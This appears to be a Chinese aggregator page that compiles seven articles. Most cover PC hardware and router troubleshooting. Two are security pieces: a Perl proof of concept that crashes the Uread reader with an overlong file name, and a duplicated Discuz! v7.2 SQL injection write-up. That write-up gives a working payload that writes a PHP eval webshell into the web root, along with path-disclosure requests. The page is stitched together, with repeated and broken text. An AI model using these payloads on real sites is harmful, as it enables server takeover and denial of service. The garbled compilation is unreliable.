Uread阅读器拒绝服务漏洞的分析与解决
“XIII”通过精心收集,向本站投稿了7篇Uread阅读器拒绝服务漏洞的分析与解决,下面小编给大家带来Uread阅读器拒绝服务漏洞的分析与解决,希望能帮助到大家!
篇1:Uread阅读器拒绝服务漏洞的分析与解决
Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可,
Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。
测试证明
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename=“a”x129;
print “------Generate testfile \”a\“x129.epub------\n”;
open(TESTFILE, “>$filename.epub”);
sleep(3);
close(TESTFILE);
print “------Complete!------\n”;
exit(1);
-----------------------------------------------------------
修复方案:
目前厂商还没有提供补丁或者升级程序,
作者 demonalex
篇2:路由器常见故障的分析与解决
宽带路由器是共享上网的必须设备,多台计算机连接后都从宽带路由器处获得分发的信号,因此这方面的维护及故障排查工作也不可忽视。因此本文挑选了宽带路由器在日常使用中最易出现的故障现象,并提出了解决办法。希望通过此文,能对读者朋友们分析与解决这方面故障提供帮助。
一、使用宽带路由器后上网速度变慢。
故障现象:有两台电脑要共享上网,因此安装了宽带路由器,可是就算只有一台电脑在上网,速度也很慢,这是什么原因?
故障解决:这其实不能算作故障。通过宽带路由器共享上网,会使上网速度存在一定的损耗,这是避免不了的。不过可以通过以下办法将这种损耗降至最低,即更改路由器的MTU值:
MTU值的意思是网络上传送的最大数据包,单位是字节。不同的接入方式,MTU值是不一样的,如果值太大就会产生很多数据包碎片,增加丢包率,降低网络速度。平常使用的宽带PPPoE连接方式,其MTU值最大为1492,解决的办法就是在注册表中对MaxMTU值逐步调低,直到网络最正常为止。MaxMTU在注册表中的位置是:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\sNetTrans\00yy,键名为“MaxMTU”,其中“yy”是TCP/IP的入口,随设置的不同而不同,一般在00到30之间。
那么又如何判定某个MTU值是最适合的呢?进入DOS环境,输入以下命令行:
ping -f -l 1492 192.168.0.1.
提示:其中“192.168.0.1”是网关IP地址,1492为数据包的长度,参数“-l”中是小写的L.如果出现下面信息:Packet needs to be fragmented but DF set,那就表示MTU值太大了。
而如果出现:Reply from 192.168.0.1: bytes=1492 time<10ms TTL=128则表示此MTU值是可行的,不过还是建议多试几个找到最佳值。
问题总结:这也是使用宽带路由器上网的一个小小弊端。通过对网速的实测证明,在ADSL接入电脑之间安装宽带路由器后,在多台电脑同时在线的情况下,由于路由器在地址解析、路由分发等方面的耽误,实际到达电脑的速度比单机直接连入ADSL线路要稍慢一些。
二、接上宽带路由器不能拨号。
故障现象:通过一台服务器作代理共享ADSL上网,拨号一直正常;加装了宽带路由器之后,就无法拨号。
故障解决:根据现象来看,刚买回的产品硬件方面应该是不会有问题的,问题大多出在路由器的软件设置方面,
可找到路由器的产品说明书,按其默认IP地址进入配置界面,因为使用的是ADSL拨号上网,所以网络协议应该选择PPPoE方式;另外还必须正确填写从ISP处获得的ADSL用户名和密码;接着启用DHCP服务,目的是让路由器自动为与其相连的客户端分配IP地址以及DNS信息等。通过这几步配置后再拨号,一般都能解决问题。
另外,现在的宽带路由器一般都具有自动拨号的功能,如果手动拨号出现问题,可以在路由器里按照刚才的设置方法配置后,即可网内所有电脑开机就在线,无须再拨号。
问题总结:从此例可以看出,宽带路由器问题大都出自软件配置。
三、使用宽带路由器方式共享上网频繁掉线。
故障现象:一个4台计算机的局域网络通过宽带路由器共享ADSL,其中一台计算机最近出现每隔一段时间就会断线又自动重连的问题。
故障解决:能够连接网络只是定时断线,说明问题还是出在宽带路由器本身,比如稳定性、设置方面等;可以按照以下思路或办法去排查。
1)检查是否因为局域网内经常有人使用BT软件下载资料。在共享网络中这是一个影响速度的大问题。
2)到路由器的系统日志里检查,通过对出错信息的分析看能否找到原因;或者在路由器“WAN设置”里选择“按需连接”,然后把自动断线等待时间设成0分钟。
3)把路由器恢复成出厂默认设置,再输入密码重新配置一次(其他设置先别动)。
4)到路由器 上查找与此产品相关的最新升级、补丁程序。
问题总结:网络设备的不断重启现象比较常见,问题也可能来自多个方面。排查这类问题时应该细心,大胆的多考虑一些问题源。
四、无法登录至宽带路由器设置页面。
故障现象:想对宽带路由器作共享上网设置,为何进不了管理界面?
故障解决:如果以前成功进入过设置界面,那首先检查宽带路由器与电脑的硬件连接情况,比如网卡和路由器的对应LAN口上的指示灯是否正常闪烁;接着检查是否在系统中有软件防火墙存在,有则关闭它;然后查看网卡的网络属性,查看路由器说明书,如果其默认情况下开启DHCP服务,就将网卡设为“自动获取IP地址”,不然须将本机地址设为与宽带路由器同一网段,再将网关地址设为路由器的默认IP地址。
由于一般宽带路由器提供的都是Web管理方式,因此打开“Internet选项”对话框,选择“连接”选项卡,如果曾经创建过连接请勾选“从不进行拨号连接”选项,再点击局域网设置,清空所有选项。通过以上解决办法的综合运用,应该可以解决此问题了。
问题总结:无法进入宽带路由器管理界面作设置的问题,也很常见。一方面要认真阅读产品说明书,输入正确的路由器默认地址;另一方面应查看宽带路由器与计算机是否正确连接。这样才能保证能正常进入宽带路由器的管理界面。
篇3:DVD光盘刻录机常见故障分析与解决
DVD光盘刻录机随着价格的不断降底,越来越多的朋友都把光驱换成了刻录机了,但是在实际使用的时候因为不常用的等原因,碰到一些小问题,下面就为大家分析一下使用DVD光盘刻录机有可能出现的小故障及解决方法小知识.
刻录机无法识别在所有故障中发生的几率不算太大,不过一旦出现,之后所说的一切都已无法实现,因为刻录机都已经找不到了... 所以这最基础的的故障得不到解决往往是最令人无可奈何的,
刻录机无法被系统识别的原因其实有多种多样,排除刻录机硬件本身已经损坏的原因,下面我们分别来看看到底哪些可以被解决的原因会造成这种情况,又应该如何去解决。
1. 电源线或者数据线未插好
这种其实是最傻的情况,但很多马虎的朋友也经常会出现这种情况,其结果自然就是检测不到刻录机,通常在开机启动POST画面就会看到光驱不在显示之列了。当然,解决方法也很简单,自然就是――关机――插好――再开机,呵呵。
2. 刻录机能识别,但是识别名是乱码
具体会乱码成什么样是随机的,当然这种情况下机器也无法正常使用。造成这种情况的一般是数据线损坏或者接口接触不良,更换数据线或者重新插拔下数据线就能解决,这种问题在老式的IDE接口上发生的几率比较大,
3. 外置刻录机找不到硬件,或者显示连接一个未知的USB设备
这种情况对于不少使用外置刻录机的朋友来说可能是经常碰到的问题,造成的原因也多种多样。
首先,USB接口供电不足是造成这个情况的罪魁祸首,部分超薄刻录机所支持的USB取电工作仅仅是针对较新的主板,而较老的主板通常USB供电能力要远远不及较新的主板,以致造成无法驱动外置刻录机,而这种情况下系统则会发生无法找到硬件的毛病。解决的方法是,使用外置电源。
其次,部分USB连接线材质量不过关也会造成此类情况,这里推荐使用刻录机原装的线材,自己选购的话也尽量选购那种带有屏蔽磁环的线材,使用过于蹩脚的线材容易导致系统识别错误,也就是上述显示连接一个未知的USB设备。
最后,其实外置设备的连接顺序也很有讲究,正确的做法应该是先连接电源,等刻录机自检完成(通常是LED灯熄灭),再接上USB线,如果连接顺序不正确,亦有可能导致外置刻录机不能被系统所识别。
4. 盘符无法分配的问题
这个问题比较少见,但是也不是完全不会碰到,通常可能是某些软件做了设定,盘符被隐藏或者未被分配,那么需要使用相应的软件打开隐藏或者使用管理工具中的磁盘管理给光驱分配一个盘符。如图,开始――运行――输入diskmgmt.msc即可进入Windows磁盘管理程序,在这里可以对硬盘和光驱进行分区,格式化,盘符分配等操作。
篇4:解决集成声卡故障的分析与处理
【故障现象】电脑在安装完声卡的驱动程序后,不能发声,
解决集成声卡故障的分析与处理
,
【故障分析与处理】有可能是声卡在BIOS中被禁用了,进入BIOS的AdvancedChipsetFeatures项,将AC97Audio设置为Auto即可。也有可能是驱动程序或冲突方面的问题,应该检查驱动程序的版本,检查声卡是否和其他设备有冲突。
篇5:Discuz! v7.2 注入漏洞分析与利用漏洞预警
漏洞分析:
文件./manyou/sources/notice.php
相关代码:
$appid = intval($_GET['appid']);
$db->query(“DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'”);
showmessage('manyou:done', 'userapp.php script=notice&act
ion=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']); //此处并没有进行过滤,直接导致注入的产生
if($act
ion == 'invite') {
$query = $db->query(“SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'”);
if($value = $db->fetch_array($query)) {
$db->query(“DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'”);
showmessage('manyou:done', 'userapp.php script=notice&act
ion=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query(“DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'”);
showmessage('manyou:done', 'userapp.php script=notice');
}
}
很简单的一个漏洞,
Discuz! v7.2 注入漏洞分析与利用漏洞预警
,
在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。
ion=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23
但想
into outfile的话,我们还得有web的物理路径,这在php的情况下并不难得到。
/manyou/admincp.php my_suffix=%0A%0DTOBY57
manyou/userapp.php %0D%0A=TOBY57
这样就事具备,只差outfile了
篇6:Discuz! v7.2 注入漏洞分析与利用漏洞预警
漏洞分析:
文件./manyou/sources/notice.php
相关代码:
if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query(“DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'”);
showmessage('manyou:done', 'userapp.php?script=notice&act
ion=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']); //此处并没有进行过滤,直接导致注入的产生
if($act
ion == 'invite') {
$query = $db->query(“SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'”);
if($value = $db->fetch_array($query)) {
$db->query(“DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'”);
showmessage('manyou:done', 'userapp.php?script=notice&act
ion=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query(“DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'”);
showmessage('manyou:done', 'userapp.php?script=notice');
}
}
很简单的一个漏洞,
Discuz! v7.2 注入漏洞分析与利用漏洞预警
,
在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。
/userapp.php?script=notice&view=all&option=deluserapp&act
ion=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23
al($_POST['O']);?>的十六进制表示。
但想
into outfile的话,我们还得有web的物理路径,这在php的情况下并不难得到。
/manyou/admincp.php?my_suffix=%0A%0DTOBY57
/manyou/userapp.php?%0D%0A=TOBY57
这样就事具备,只差outfile了。
篇7:显卡故障分析与解决技巧指南 接触不良
一、接触不良
肉眼可见的接触不良,如板卡一头高一头底的,那是轻而易举就可以排除的,不过有一些显卡的接触不良非常的隐蔽,表面上看安装得很好,但实际上接触不良,导致很多莫名其妙的故障。
案例:一 龙650机器,是2001年春节装的。一段时间后,开机不正常,经常在第一次开机时全黑无反应,切断电源后再开机则成功,好像系统要预热一样。
分析:这个故障看上去是电源的问题,也确实在一些老机器上出现过更换电源解决问题的案例。但此机购置的时间较短,部件都是新的,而且经仔细检验过,这样的配置同时购置的其他机器并未出现此种故障,于是从最简单的步骤着手的原则,先检查连线,插拔一遍后开机,无效;从CMOS里的电源设置作了调整,设置出厂默认值,无效;经询问得知,此机前几天曾被打开机箱清除灰尘。至此,估计是某元件松动导致了接触不良或是短路。
解决:开机的时候仔细观察,发现面板的指示灯不是马上亮的,而是过了5秒钟后才亮,电源灯、硬盘灯和光驱面板灯都正常,只是好像系统无信号送到显示器,而且系统无报警声-由于第二次开机能正常使用,所以排除了黑屏是内存没插好的原因。一般系统开机黑屏是内存和显卡两大因素造成,主板损坏的可能性很小,所以我判断可能会是显卡接触不良导致的故障。于是,重新插拔后,又将CMOS跳线放电。重新开机后,一次成功,后改回CMOS设置,经试用正常,至此,问题解决。
二、电源功率或设置的影响
现在的主板提供的高级电源管理功能很多,有节能、睡眠、ONNOW等等,但有些显卡和主板的某些电源功能有冲突,会导致进入Windows时花屏的现象。
案例:上述机器,在调试过程中开始怀疑是电源的故障,改动了CMOS中电源的设置,特别是VIDEO相关的设置,开机进入Windows后Windows98变成了256色,还提示要安装新的驱动程序。该机已经正常使用Windows98半年了,显然是基本设置错误导致的故障,而不能按Windows提示的安装新的驱动程序来排除。
分析和解决:由于当时是改动了CMOS电源选项后马上进入Windows出问题的,所以没费力就知道是电源选项的影响,
但如果是其他情况下出现的,可能就比较难想到这方面去。建议在显示不正常的时候,注意一下CMOS电源方面的影响,如果是改动了设置的,把它调整为出厂时的默认值;如果是刚装机就出现问题的,可以把出厂的默认值中的节能、ONNOW什么花哨功能禁止试试。另外因为AMD的CPU耗电量较大,一些电源质量不好或时功率不够的龙、鸟机器上面,添加购置了新硬盘或其他耗电较大的设备后,可能也会导致显卡的供电不够,大家可以用排除和替换法检验。
三、刷新BIOS后的影响
几乎每个月,出现显卡的厂商都会在网上发布新的BIOS供DIY们刷新自己的显卡,以获得新功能和修正BIOS的BUG。但也有不少人在刷新了之后,玩某些游戏时会死机或是自动跳回桌面,,更有用名牌厂家的BIOS刷坏自己的显卡的案例。如果刷新之后Windows的多数任务正常,只是某个驱动程序如PHOTOSHOP出错,你很难想到是刷新BIOS的影响,所以排除故障可能会走弯路。
建议:你的显卡工作正常的话,最好不要乱升级。因为显卡的BIOS各个版本对电脑的主板、电源有一定的相适应(兼容)特性,如果目前的部件是和睦相处的话,还是不要乱改好。那些所谓刷新后的新功能,其实大多数是噱头而已。主板的BIOS也是一样,除非是出于为了支持新的CPU和大硬盘的考虑,没事乱刷有点冒险,不值得。另外,显卡的固定螺丝不用拧得太紧太死,适中即可,因为显卡里开机箱的挡板还有一点距离,如果拧螺丝太紧会强行把显卡的一头微微拉离插槽,可能会导致接触不良。那就和固定螺丝的意愿背道而驰了。
附录小技巧:一般诊断显卡与内存故障的区别显卡和内存有问题,电脑开机都是黑屏的,如何区分呢?要注意的要点有:
1、注意电脑有无小喇叭的报警声,如果是有报警声的,显卡的问题可能会大一点,而且我们可以从报警声的长短和次数来判断具体的故障(这方面的资料很多了,主板也可能会附带说明书,请大家自己找来参考)。
2、如果黑屏无报警声,多半是内存根本没插好或坏了。没有内存电脑根本开不了机的,当然也不会报警。
3、注意面板的显示灯状态,如果无报警声又检查过内存了,可能会是显卡接触不良的问题,往往伴随硬盘灯常亮;还可以看显示器的状态灯,如果黑屏伴随显示器上各状态调节的指示灯在同时不停地闪烁,可能会是连接显卡到显示器的电缆插头松了,或是显卡没在插槽内插紧。
【Uread阅读器拒绝服务漏洞的分析与解决】相关文章:
2.Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞
10.语素分析与构词分析
文档为doc格式
